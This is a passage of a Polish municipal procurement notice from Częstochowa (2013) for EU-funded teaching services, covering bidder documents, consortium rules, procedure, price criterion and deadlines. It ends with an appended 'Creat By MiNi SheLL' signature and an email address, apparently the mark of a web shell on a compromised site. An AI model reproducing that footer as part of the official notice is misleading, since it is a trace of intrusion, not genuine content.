c) przynajmniej 2-letnie doświadczenie w nauczaniu przedmiotu/przedmiotów (zgodnie z częścią na którą składana jest oferta).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów, określonych w punkcie 6.1.siwz
1.1. Dokumenty, o których mowa w punkcie 6.1 muszą być złożone w oryginale.
1.2. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
1.3. W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć oświadczenie wymienione w punkcie 6.1.a) wraz z dokumentem wymienionym w punkcie 6.1.b) siwz. Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
1.4. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu oraz osobach dolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W/w zobowiązanie musi być przedstawione w oryginale.
1.5 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku, gdy wykonawca wykazując spełnianie warunków, o których mowa w punktach 5.2. SIWZ polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
2. Inne dokumenty wymagane przez zamawiającego:
a) Wypełniony druk OFERTA stanowiący załącznik nr 1 do specyfikacji, zawierający oświadczenie, że wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zleceniodawca dopuszcza możliwość przesunięcia terminu realizacji zamówienia, jeśli wystąpią obiektywne okoliczności niezależne od zleceniobiorcy uniemożliwiające wykonanie usługi i jednocześnie wydłużenia okresu realizacji usługi o czas trwania tych okoliczności.
2. Istnieje możliwość dokonania zmiany osób przewidzianych do wykonania zamówienia, przedstawionych w ofercie przetargowej Zleceniobiorcy, za uprzednią pisemną zgodą Zleceniodawcy, w następujących okolicznościach:
- śmierci, choroby lub innych zdarzeń losowych, które muszą być udokumentowane.
W przypadku zmiany tej osoby, nowa osoba musi spełniać co najmniej wymagania określone w specyfikacji istotnych warunków zamówienia dla tej osoby. Zleceniodawca może także zażądać od Zleceniobiorcy zmiany osoby, o której mowa, jeżeli uzna, że nie wykonuje należycie swoich obowiązków. Zleceniobiorca obowiązany jest dokonać zmiany tej  osoby w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zleceniodawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ebonarska@czestochowa.um.gov.pl Wydział Inwestycji i Zamówień Publicznych Urzędu Miasta Częstochowy, ul. Śląska 11/13, 42-217 Czestochowa, pokój 417.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2013 godzina 09:30, miejsce: Biuro Obsługi Interesanta stanowisko Wydziału Nadzoru i Administracji. Otwarcie ofert : 14/05/2013 o godz. 10:00 w pokoju 417..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytetu IX - Rozwój kompetencji i wykształcenia w regionach, Działania 9.1. - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com